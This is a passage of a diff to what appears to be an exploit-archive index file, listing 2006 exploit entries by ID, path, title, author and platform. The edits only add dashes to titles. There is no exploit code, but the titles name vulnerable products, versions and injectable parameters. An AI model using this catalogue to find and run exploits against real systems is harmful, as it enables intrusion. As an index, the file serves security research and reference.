Remote File Include",2006-10-07,"Mehmet Ince",php,webapps,0 -2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 (lire.php) Remote SQL Injection Exploit",2006-10-07,s4mi,php,webapps,0 +2484,platforms/php/webapps/2484.txt,"FreeForum <= 0.9.7 - (forum.php) Remote File Include",2006-10-07,"Mehmet Ince",php,webapps,0 +2485,platforms/php/webapps/2485.pl,"Cahier de texte 2.0 - (lire.php) Remote SQL Injection Exploit",2006-10-07,s4mi,php,webapps,0 2486,platforms/php/webapps/2486.txt,"phpBB Random User Registration Number 1.0 Mod Inclusion",2006-10-07,bd0rk,php,webapps,0 2487,platforms/php/webapps/2487.php,"4Images 1.7.x - (search.php) Remote SQL Injection Exploit",2006-10-08,Synsta,php,webapps,0 -2488,platforms/php/webapps/2488.txt,"PHPMyNews <= 1.4 (cfg_include_dir) Remote File Include Vulnerabilities",2006-10-08,"Mehmet Ince",php,webapps,0 +2488,platforms/php/webapps/2488.txt,"PHPMyNews <= 1.4 - (cfg_include_dir) Remote File Include Vulnerabilities",2006-10-08,"Mehmet Ince",php,webapps,0 2489,platforms/php/webapps/2489.pl,"Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit",2006-10-08,Kacper,php,webapps,0 -2490,platforms/php/webapps/2490.txt,"Freenews <= 1.1 (moteur.php) Remote File Include",2006-10-08,"Mehmet Ince",php,webapps,0 -2491,platforms/php/webapps/2491.pl,"phpPC <= 1.03 RC1 (/lib/functions.inc.php) Remote File Include Exploit",2006-10-08,ThE-WoLf-KsA,php,webapps,0 +2490,platforms/php/webapps/2490.txt,"Freenews <= 1.1 - (moteur.php) Remote File Include",2006-10-08,"Mehmet Ince",php,webapps,0 +2491,platforms/php/webapps/2491.pl,"phpPC <= 1.03 RC1 - (/lib/functions.inc.php) Remote File Include Exploit",2006-10-08,ThE-WoLf-KsA,php,webapps,0 2492,platforms/linux/local/2492.s,"Infecting Elf Binaries to Gain Local Root Exploit",2006-10-08,Sha0,linux,local,0 -2493,platforms/php/webapps/2493.pl,"docmint <= 2.0 (engine/require.php) Remote File Inclusion Exploit",2006-10-09,K-159,php,webapps,0 +2493,platforms/php/webapps/2493.pl,"docmint <= 2.0 - (engine/require.php) Remote File Inclusion Exploit",2006-10-09,K-159,php,webapps,0 2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2496,platforms/php/webapps/2496.txt,"WebYep <= 1.1.9 - (webyep_sIncludePath) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery <= 1.4 - (doc_directory) File Include Vulnerabilities",2006-10-09,the_day,php,webapps,0 2498,platforms/php/webapps/2498.php,"Flatnuke <= 2.5.8 - file() Privilege Escalation / Code Execution Exploit",2006-10-10,rgod,php,webapps,0 2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - (userlang) Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 -2500,platforms/php/webapps/2500.pl,"phpMyAgenda <= 3.1 (templates/header.php3) Local File Include Exploit",2006-10-10,"Nima Salehi",php,webapps,0 +2500,platforms/php/webapps/2500.pl,"phpMyAgenda <= 3.1 - (templates/header.php3) Local File Include Exploit",2006-10-10,"Nima Salehi",php,webapps,0 2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta (ftag.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 2502,platforms/php/webapps/2502.txt,"registroTL (main.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 2503,platforms/php/webapps/2503.txt,"compteur 2.0 - (param_editor.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 2504,platforms/php/webapps/2504.txt,"eboli (index.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 -2505,platforms/php/webapps/2505.txt,"JASmine <= 0.0.2 (index.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 -2506,platforms/php/webapps/2506.txt,"Foafgen <= 0.3 (redir.php) Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 +2505,platforms/php/webapps/2505.txt,"JASmine <= 0.0.2 - (index.php) Remote File Include",2006-10-10,DarkFig,php,webapps,0 +2506,platforms/php/webapps/2506.txt,"Foafgen <= 0.3 - (redir.php) Local Source Disclosure",2006-10-10,DarkFig,php,webapps,0 2507,platforms/php/webapps/2507.txt,"Album Photo Sans Nom <= 1.6 - Remote Source Disclosure",2006-10-10,DarkFig,php,webapps,0 -2508,platforms/php/webapps/2508.txt,"vtiger CRM <= 4.2 (calpath) Multiple Remote File Include Vulnerabilities",2006-10-10,the_day,php,webapps,0 +2508,platforms/php/webapps/2508.txt,"vtiger CRM <= 4.2 - (calpath) Multiple Remote File Include Vulnerabilities",2006-10-10,the_day,php,webapps,0 2509,platforms/php/webapps/2509.txt,"Exhibit Engine <= 1.5 RC 4 - (photo_comment.php) File Include Exploit",2006-10-10,Kacper,php,webapps,0 -2510,platforms/php/webapps/2510.txt,"Claroline <= 1.8.0 rc1 (import.lib.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 -2511,platforms/php/webapps/2511.txt,"PHPLibrary <= 1.5.3 (grid3.lib.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 -2512,platforms/php/webapps/2512.txt,"Jinzora <= 2.1 (media.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 -2513,platforms/php/webapps/2513.txt,"ae2 (standart.inc.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 +2510,platforms/php/webapps/2510.txt,"Claroline <= 1.8.0 rc1 - (import.lib.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 +2511,platforms/php/webapps/2511.txt,"PHPLibrary <= 1.5.3 - (grid3.lib.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 +2512,platforms/php/webapps/2512.txt,"Jinzora <= 2.1 - (media.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 +2513,platforms/php/webapps/2513.txt,"ae2 - (standart.inc.php) Remote File Include",2006-10-10,k1tk4t,php,webapps,0 2514,platforms/php/webapps/2514.txt,"n@board <= 3.1.9e (naboard_pnr.php) Remote File Include",2006-10-11,mdx,php,webapps,0 -2515,platforms/multiple/dos/2515.txt,"Kmail <= 1.9.1 (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 +2515,platforms/multiple/dos/2515.txt,"Kmail <= 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0 2516,platforms/php/webapps/2516.pl,"CommunityPortals 1.0 - (import-archive.php) File Include",2006-10-11,"Nima Salehi",php,webapps,0 -2517,platforms/php/webapps/2517.pl,"PHP News Reader <= 2.6.4 (phpbb.inc.php) Remote File Include Exploit",2006-10-11,"Nima Salehi",php,webapps,0 -2518,platforms/php/webapps/2518.txt,"SH-News <= 3.1 (scriptpath) Multiple Remote File Include Vulnerabilities",2006-10-11,v1per-haCker,php,webapps,0 +2517,platforms/php/webapps/2517.pl,"PHP News Reader <= 2.6.4 - (phpbb.inc.php) Remote File Include Exploit",2006-10-11,"Nima Salehi",php,webapps,0 +2518,platforms/php/webapps/2518.txt,"SH-News <= 3.1 - (scriptpath) Multiple Remote File Include Vulnerabilities",2006-10-11,v1per-haCker,php,webapps,0 2519,platforms/php/webapps/2519.txt,"Minichat 6.0 - (ftag.php) Remote File Include",2006-10-11,Zickox,php,webapps,0 2520,platforms/php/webapps/2520.txt,"Softerra PHP Developer Library <= 1.5.3 - File Include Vulnerabilities",2006-10-12,MP,php,webapps,0 -2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 (spaw) Remote File Include",2006-10-12,v1per-haCker,php,webapps,0 +2521,platforms/php/webapps/2521.txt,"Download-Engine <= 1.4.2 - (spaw) Remote File Include",2006-10-12,v1per-haCker,php,webapps,0 2522,platforms/php/webapps/2522.txt,"phpBB Journals System Mod 1.0.2 [RC2] - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 PPT Local Buffer Overflow PoC",2006-10-12,Nanika,windows,dos,0 -2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0 +2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service Exploit",2006-10-12,kokanin,bsd,dos,0 2525,platforms/php/webapps/2525.pl,"phpBB Insert User Mod <= 0.1.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 2526,platforms/php/webapps/2526.txt,"phpht Topsites (common.php) Remote File Include",2006-10-12,"Mehmet Ince",php,webapps,0 2527,platforms/php/webapps/2527.c,"Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux)",2006-10-12,ShadOS,php,webapps,0 2528,platforms/php/webapps/2528.txt,"miniBB keyword_replacer <= 1.0 - (pathToFiles) File Include",2006-10-12,Kw3[R]Ln,php,webapps,0 -2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 (Htmls) Remote File Include Vulnerabilities",2006-10-12,mdx,php,webapps,0 +2529,platforms/php/webapps/2529.txt,"AFGB GUESTBOOK 2.2 - (Htmls) Remote File Include Vulnerabilities",2006-10-12,mdx,php,webapps,0 2530,platforms/windows/remote/2530.py,"BulletProof FTP Client 2.45 - Remote Buffer Overflow Exploit (PoC)",2006-10-12,h07,windows,remote,0 2531,platforms/php/webapps/2531.txt,"phpBB Import Tools Mod <= 0.1.4 - Remote File Include",2006-10-12,boecke,php,webapps,0 2532,platforms/php/webapps/2532.txt,"phpBB Ajax Shoutbox <= 0.0.5 - Remote File Include",2006-10-12,boecke,php,webapps,0 2533,platforms/php/webapps/2533.txt,"phpBB SpamBlocker Mod <= 1.0.2 - Remote File Include Exploit",2006-10-12,"Nima Salehi",php,webapps,0 -2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 (lang_prefix) Remote File Include Exploit",2006-10-12,r0ut3r,php,webapps,0 +2534,platforms/php/webapps/2534.pl,"Redaction System 1.0 - (lang_prefix) Remote File Include Exploit",2006-10-12,r0ut3r,php,webapps,0 2535,platforms/php/webapps/2535.txt,"phpMyConferences <= 8.0.2 - (menu.inc.php) File Include",2006-10-13,k1tk4t,php,webapps,0 2536,platforms/php/webapps/2536.txt,"Open Conference Systems <= 1.1.4 - (fullpath) File Include Vulnerabilities",2006-10-13,k1tk4t,php,webapps,0 -2537,platforms/php/webapps/2537.pl,"maluinfo <= 206.2.38 (bb_usage_stats.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2538,platforms/php/webapps/2538.pl,"phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2539,platforms/php/webapps/2539.txt,"Genepi <= 1.6 (genepi.php) Remote File Include",2006-10-13,Kw3[R]Ln,php,webapps,0 +2537,platforms/php/webapps/2537.pl,"maluinfo <= 206.2.38 - (bb_usage_stats.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2538,platforms/php/webapps/2538.pl,"phpBB PlusXL <= 2.0_272 - (constants.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2539,platforms/php/webapps/2539.txt,"Genepi <= 1.6 - (genepi.php) Remote File Include",2006-10-13,Kw3[R]Ln,php,webapps,0 2540,platforms/php/webapps/2540.txt,"Cdsagenda <= 4.2.9 - (SendAlertEmail.php) File Include",2006-10-13,Drago84,php,webapps,0 -2541,platforms/bsd/dos/2541.c,"FreeBSD <= 6.1-RELEASE-p10 (ftruncate) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 -2542,platforms/bsd/dos/2542.c,"FreeBSD <= 6.1-RELEASE-p10 (scheduler) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 +2541,platforms/bsd/dos/2541.c,"FreeBSD <= 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 +2542,platforms/bsd/dos/2542.c,"FreeBSD <= 6.1-RELEASE-p10 - (scheduler) Local Denial of Service Exploit",2006-10-13,kokanin,bsd,dos,0 2543,platforms/solaris/local/2543.sh,"Solaris 10 (libnspr) - Arbitrary File Creation Local Root Exploit",2006-10-13,"Marco Ivaldi",solaris,local,0 2544,platforms/php/webapps/2544.pl,"phpBB Amazonia Mod (zufallscodepart.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale <= 4.1.1 - Remote Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 (lat2cyr.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - (lat2cyr.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod <= 1.0b Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 functions_rpg_events Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod (archive_topic.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod <= 0.8.0 - Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 File Inclusion",2006-10-13,bd0rk,php,webapps,0 -2552,platforms/php/webapps/2552.pl,"phpBB Security <= 1.0.1 (php_security.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 -2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 (Offline.php) Remote File Include",2006-10-13,SilenZ,php,webapps,0 +2552,platforms/php/webapps/2552.pl,"phpBB Security <= 1.0.1 - (php_security.php) Remote File Include Exploit",2006-10-13,"Nima Salehi",php,webapps,0 +2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - (Offline.php) Remote File Include",2006-10-13,SilenZ,php,webapps,0 2554,platforms/php/webapps/2554.php,"cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit (PHP)",2006-10-13,"Nima Salehi",php,webapps,0 2555,platforms/php/webapps/2555.txt,"CentiPaid <= 1.4.2 centipaid_class.php Remote File Include",2006-10-14,Kw3[R]Ln,php,webapps,0 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro <= 1.0 Image Upload with Code Execution",2006-10-14,Kacper,php,webapps,0 -2557,platforms/php/webapps/2557.txt,"IncCMS Core <= 1.0.0 (settings.php) Remote File Include",2006-10-14,Kacper,php,webapps,0 -2558,platforms/php/webapps/2558.txt,"Jinzora <= 2.6 (extras/mt.php) Remote File Include",2006-10-14,ddoshomo,php,webapps,0 -2559,platforms/php/webapps/2559.txt,"CyberBrau <= 0.9.4 (forum/track.php) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 -2560,platforms/php/webapps/2560.txt,"CampSite <= 2.6.1 (g_documentRoot) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 +2557,platforms/php/webapps/2557.txt,"IncCMS Core <= 1.0.0 - (settings.php) Remote File Include",2006-10-14,Kacper,php,webapps,0 +2558,platforms/php/webapps/2558.txt,"Jinzora <= 2.6 - (extras/mt.php) Remote File Include",2006-10-14,ddoshomo,php,webapps,0 +2559,platforms/php/webapps/2559.txt,"CyberBrau <= 0.9.4 - (forum/track.php) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 +2560,platforms/php/webapps/2560.txt,"CampSite <= 2.6.1 - (g_documentRoot) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 2561,platforms/php/webapps/2561.txt,"NuralStorm Webmail <= 0.98b (process.php) Remote Include",2006-10-15,Kw3[R]Ln,php,webapps,0 -2562,platforms/php/webapps/2562.txt,"AROUNDMe <= 0.5.2 (templatePath) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 -2563,platforms/php/webapps/2563.pl,"phpBurningPortal <= 1.0.1 (lang_path) Remote File Include Exploit",2006-10-15,r0ut3r,php,webapps,0 -2564,platforms/php/webapps/2564.pl,"phpBBFM <= 206-3-3 (phpbb_root_path) Remote File Include Exploit",2006-10-15,Kamalian,php,webapps,0 +2562,platforms/php/webapps/2562.txt,"AROUNDMe <= 0.5.2 - (templatePath) Remote File Include",2006-10-15,Kw3[R]Ln,php,webapps,0 +2563,platforms/php/webapps/2563.pl,"phpBurningPortal <= 1.0.1 - (lang_path) Remote File Include Exploit",2006-10-15,r0ut3r,php,webapps,0 +2564,platforms/php/webapps/2564.pl,"phpBBFM <= 206-3-3 - (phpbb_root_path) Remote File Include Exploit",2006-10-15,Kamalian,php,webapps,0 2565,platforms/osx/local/2565.pl,"Xcode OpenBase <= 9.1.5 - Local Root Exploit (OSX)",2006-10-15,"Kevin Finisterre",osx,local,0 -2566,platforms/php/webapps/2566.txt,"DigitalHive <= 2.0 RC2 (base_include.php) Remote Include",2006-10-15,SHiKaA,php,webapps,0 -2567,platforms/php/webapps/2567.txt,"Def-Blog <= 1.0.3 (comadd.php) Remote SQL Injection",2006-10-15,SHiKaA,php,webapps,0 -2568,platforms/php/webapps/2568.txt,"webSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit",2006-10-15,Kiba,php,webapps,0 +2566,platforms/php/webapps/2566.txt,"DigitalHive <= 2.0 RC2 - (base_include.php) Remote Include",2006-10-15,SHiKaA,php,webapps,0 +2567,platforms/php/webapps/2567.txt,"Def-Blog <= 1.0.3 - (comadd.php) Remote SQL Injection",2006-10-15,SHiKaA,php,webapps,0 +2568,platforms/php/webapps/2568.txt,"webSPELL <= 4.01.01 - (getsquad) Remote SQL Injection Exploit",2006-10-15,Kiba,php,webapps,0 2569,platforms/solaris/local/2569.sh,"Solaris 10 libnspr - LD_PRELOAD Arbitrary File Creation Local Root Exploit",2006-10-16,"Marco Ivaldi",solaris,local,0 2570,platforms/php/webapps/2570.txt,"OpenDock FullCore <= 4.4 - Remote File Include Vulnerabilities",2006-10-16,Matdhule,php,webapps,0 2571,platforms/windows/dos/2571.pl,"Xfire <= 1.6.4 - Remote Denial of Service Exploit (Perl)",2006-10-16,n00b,windows,dos,0 @@ -2271,58 +2271,58 @@ id,file,description,date,author,platform,type,port 2575,platforms/php/webapps/2575.php,"Boonex Dolphin <= 5.2 index.php Remote Code Execution Exploit",2006-10-16,w4ck1ng,php,webapps,0 2576,platforms/php/webapps/2576.txt,"Specimen Image Database (client.php) Remote File Include",2006-10-16,Kw3[R]Ln,php,webapps,0 2577,platforms/php/webapps/2577.txt,"P-News <= 1.16 - Remote File Include",2006-10-16,vegas78,php,webapps,0 -2578,platforms/php/webapps/2578.txt,"phpMyManga <= 0.8.1 (template.php) Multiple File Include Vulnerabilities",2006-10-16,nuffsaid,php,webapps,0 +2578,platforms/php/webapps/2578.txt,"phpMyManga <= 0.8.1 - (template.php) Multiple File Include Vulnerabilities",2006-10-16,nuffsaid,php,webapps,0 2579,platforms/php/webapps/2579.pl,"WoltLab Burning Book <= 1.1.2 - Remote SQL Injection Exploit PoC",2006-10-16,ShAnKaR,php,webapps,0 2580,platforms/osx/local/2580.pl,"Xcode OpenBase <= 9.1.5 - (root file create) Local Root Exploit (OSX)",2006-10-16,"Kevin Finisterre",osx,local,0 2581,platforms/linux/local/2581.c,"NVIDIA Graphics Driver <= 8774 - Local Buffer Overflow Exploit",2006-10-16,"Rapid7 Security",linux,local,0 2582,platforms/php/webapps/2582.txt,"ALiCE-CMS 0.1 - (CONFIG[local_root]) Remote File Include",2006-10-17,nuffsaid,php,webapps,0 -2583,platforms/php/webapps/2583.php,"WSN Forum <= 1.3.4 (prestart.php) Remote Code Execution Exploit",2006-10-17,Kacper,php,webapps,0 -2584,platforms/php/webapps/2584.pl,"PHPRecipeBook <= 2.35 (g_rb_basedir) Remote File Include Exploit",2006-10-17,r0ut3r,php,webapps,0 +2583,platforms/php/webapps/2583.php,"WSN Forum <= 1.3.4 - (prestart.php) Remote Code Execution Exploit",2006-10-17,Kacper,php,webapps,0 +2584,platforms/php/webapps/2584.pl,"PHPRecipeBook <= 2.35 - (g_rb_basedir) Remote File Include Exploit",2006-10-17,r0ut3r,php,webapps,0 2585,platforms/php/webapps/2585.txt,"PHPmybibli <= 3.0.1 - Multiple Remote File Inclusion Vulnerabilities",2006-10-17,the_day,php,webapps,0 2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus <= 0.88.4 CHM Chunk Name Length DoS PoC",2006-10-17,"Damian Put",multiple,dos,0 2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus <= 0.88.4 - (rebuildpe) Remote Heap Overflow PoC",2006-10-17,"Damian Put",multiple,dos,0 -2588,platforms/php/webapps/2588.txt,"Easynews <= 4.4.1 (admin.php) Authentication Bypass",2006-10-17,nuffsaid,php,webapps,0 -2589,platforms/php/webapps/2589.txt,"Brim <= 1.2.1 (renderer) Multiple Remote File Include Vulnerabilities",2006-10-17,mdx,php,webapps,0 -2590,platforms/php/webapps/2590.txt,"phpPowerCards 2.10 (txt.inc.php) Remote Code Execution",2006-10-18,nuffsaid,php,webapps,0 -2591,platforms/php/webapps/2591.txt,"Php AMX 0.90 (plugins/main.php) Remote File Include",2006-10-18,MP,php,webapps,0 +2588,platforms/php/webapps/2588.txt,"Easynews <= 4.4.1 - (admin.php) Authentication Bypass",2006-10-17,nuffsaid,php,webapps,0 +2589,platforms/php/webapps/2589.txt,"Brim <= 1.2.1 - (renderer) Multiple Remote File Include Vulnerabilities",2006-10-17,mdx,php,webapps,0 +2590,platforms/php/webapps/2590.txt,"phpPowerCards 2.10 - (txt.inc.php) Remote Code Execution",2006-10-18,nuffsaid,php,webapps,0 +2591,platforms/php/webapps/2591.txt,"Php AMX 0.90 - (plugins/main.php) Remote File Include",2006-10-18,MP,php,webapps,0 2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board <= 1.1b2 - Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 -2593,platforms/php/webapps/2593.php,"PHP-Post <= 1.01 (template) Remote Code Execution Exploit",2006-10-18,Kacper,php,webapps,0 -2594,platforms/php/webapps/2594.php,"YapBB <= 1.2 Beta2 (yapbb_session.php) Remote File Include Exploit",2006-10-18,Kacper,php,webapps,0 -2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 (lcUser.php) Remote File Include",2006-10-18,o0xxdark0o,php,webapps,0 -2596,platforms/php/webapps/2596.pl,"EPNadmin <= 0.7 (constantes.inc.php) Remote File Include Exploit",2006-10-19,Kw3[R]Ln,php,webapps,0 -2597,platforms/multiple/dos/2597.pl,"Asterisk <= 1.0.12 / 1.2.12.1 (chan_skinny) Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 -2598,platforms/php/webapps/2598.php,"PH Pexplorer <= 0.24 (explorer_load_lang.php) Local Include Exploit",2006-10-19,Kacper,php,webapps,0 +2593,platforms/php/webapps/2593.php,"PHP-Post <= 1.01 - (template) Remote Code Execution Exploit",2006-10-18,Kacper,php,webapps,0 +2594,platforms/php/webapps/2594.php,"YapBB <= 1.2 Beta2 - (yapbb_session.php) Remote File Include Exploit",2006-10-18,Kacper,php,webapps,0 +2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 - (lcUser.php) Remote File Include",2006-10-18,o0xxdark0o,php,webapps,0 +2596,platforms/php/webapps/2596.pl,"EPNadmin <= 0.7 - (constantes.inc.php) Remote File Include Exploit",2006-10-19,Kw3[R]Ln,php,webapps,0 +2597,platforms/multiple/dos/2597.pl,"Asterisk <= 1.0.12 / 1.2.12.1 - (chan_skinny) Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0 +2598,platforms/php/webapps/2598.php,"PH Pexplorer <= 0.24 - (explorer_load_lang.php) Local Include Exploit",2006-10-19,Kacper,php,webapps,0 2599,platforms/php/webapps/2599.txt,"pandaBB (displayCategory) Remote File Include Vulnerabilities",2006-10-19,nukedclx,php,webapps,0 -2600,platforms/php/webapps/2600.txt,"Segue CMS <= 1.5.8 (themesdir) Remote File Include",2006-10-19,nuffsaid,php,webapps,0 -2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x (RCPT) Remote Stack Overflow Exploit",2006-10-19,"Greg Linares",windows,remote,25 +2600,platforms/php/webapps/2600.txt,"Segue CMS <= 1.5.8 - (themesdir) Remote File Include",2006-10-19,nuffsaid,php,webapps,0 +2601,platforms/windows/remote/2601.c,"Ipswitch IMail Server 2006 / 8.x - (RCPT) Remote Stack Overflow Exploit",2006-10-19,"Greg Linares",windows,remote,25 2602,platforms/php/webapps/2602.txt,"Power Phlogger <= 2.0.9 - (config.inc.php3) File Include",2006-10-19,x_w0x,php,webapps,0 -2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 (admin_module.php) Remote File Include",2006-10-20,MP,php,webapps,0 +2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - (admin_module.php) Remote File Include",2006-10-20,MP,php,webapps,0 2604,platforms/php/webapps/2604.txt,"WGCC <= 0.5.6b (quiz.php) Remote SQL Injection",2006-10-20,ajann,php,webapps,0 2605,platforms/php/webapps/2605.txt,"RSSonate (xml2rss.php) Remote File Include Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 -2606,platforms/php/webapps/2606.txt,"CASTOR <= 1.1.1 (lib/rs.php) Remote File Include Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 -2607,platforms/php/webapps/2607.txt,"kawf <= 1.0 (main.php) Remote File Include",2006-10-21,o0xxdark0o,php,webapps,0 +2606,platforms/php/webapps/2606.txt,"CASTOR <= 1.1.1 - (lib/rs.php) Remote File Include Exploit",2006-10-21,Kw3[R]Ln,php,webapps,0 +2607,platforms/php/webapps/2607.txt,"kawf <= 1.0 - (main.php) Remote File Include",2006-10-21,o0xxdark0o,php,webapps,0 2608,platforms/php/webapps/2608.txt,"Virtual Law Office (phpc_root_path) Remote File Include Vulnerabilities",2006-10-21,"Mehmet Ince",php,webapps,0 2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application Remote File Include Vulnerabilities",2006-10-21,"Mehmet Ince",php,webapps,0 2611,platforms/php/webapps/2611.txt,"Trawler Web CMS <= 1.8.1 - Multiple Remote File Include Vulnerabilities",2006-10-21,k1tk4t,php,webapps,0 2612,platforms/php/webapps/2612.txt,"PGOSD (misc/function.php3) Remote File Include",2006-10-22,"Mehmet Ince",php,webapps,0 2613,platforms/php/webapps/2613.txt,"MambWeather Mambo Module <= 1.8.1 - Remote Include",2006-10-22,h4ntu,php,webapps,0 -2614,platforms/php/webapps/2614.txt,"Net_DNS <= 0.3 (DNS/RR.php) Remote File Include",2006-10-22,Drago84,php,webapps,0 +2614,platforms/php/webapps/2614.txt,"Net_DNS <= 0.3 - (DNS/RR.php) Remote File Include",2006-10-22,Drago84,php,webapps,0 2615,platforms/php/webapps/2615.txt,"SpeedBerg <= 1.2beta1 - (SPEEDBERG_PATH) File Include Vulnerabilities",2006-10-22,k1tk4t,php,webapps,0 -2616,platforms/php/webapps/2616.php,"JaxUltraBB <= 2.0 (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 -2617,platforms/php/webapps/2617.php,"PHP-Nuke <= 7.9 (Encyclopedia) Remote SQL Injection Exploit",2006-10-22,Paisterist,php,webapps,0 -2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 (common.php) Remote File Include",2006-10-22,"the master",php,webapps,0 +2616,platforms/php/webapps/2616.php,"JaxUltraBB <= 2.0 - (delete.php) Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 +2617,platforms/php/webapps/2617.php,"PHP-Nuke <= 7.9 - (Encyclopedia) Remote SQL Injection Exploit",2006-10-22,Paisterist,php,webapps,0 +2620,platforms/php/webapps/2620.txt,"EZ-Ticket 0.0.1 - (common.php) Remote File Include",2006-10-22,"the master",php,webapps,0 2621,platforms/php/webapps/2621.txt,"Fully Modded phpBB <= 2021.4.40 - Multiple File Include Vulnerabilities",2006-10-23,020,php,webapps,0 2622,platforms/php/webapps/2622.txt,"OTSCMS <= 2.1.3 - Multiple Remote File Include Vulnerabilities",2006-10-23,GregStar,php,webapps,0 -2623,platforms/php/webapps/2623.pl,"SourceForge <= 1.0.4 (database.php) Remote File Include Exploit",2006-10-23,Kw3[R]Ln,php,webapps,0 -2624,platforms/php/webapps/2624.txt,"WiClear <= 0.10 (path) Remote File Include Vulnerabilities",2006-10-23,"the master",php,webapps,0 -2625,platforms/windows/dos/2625.c,"QK SMTP <= 3.01 (RCPT TO) Remote Denial of Service Exploit",2006-10-23,"Greg Linares",windows,dos,0 -2626,platforms/php/webapps/2626.txt,"MDweb <= 1.3 (chemin_appli) Remote File Include Vulnerabilities",2006-10-23,Drago84,php,webapps,0 -2627,platforms/php/webapps/2627.txt,"Jaws <= 0.5.2 (include/JawsDB.php) Remote File Include",2006-10-23,Drago84,php,webapps,0 -2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 (includes/functions.php) Remote File Include 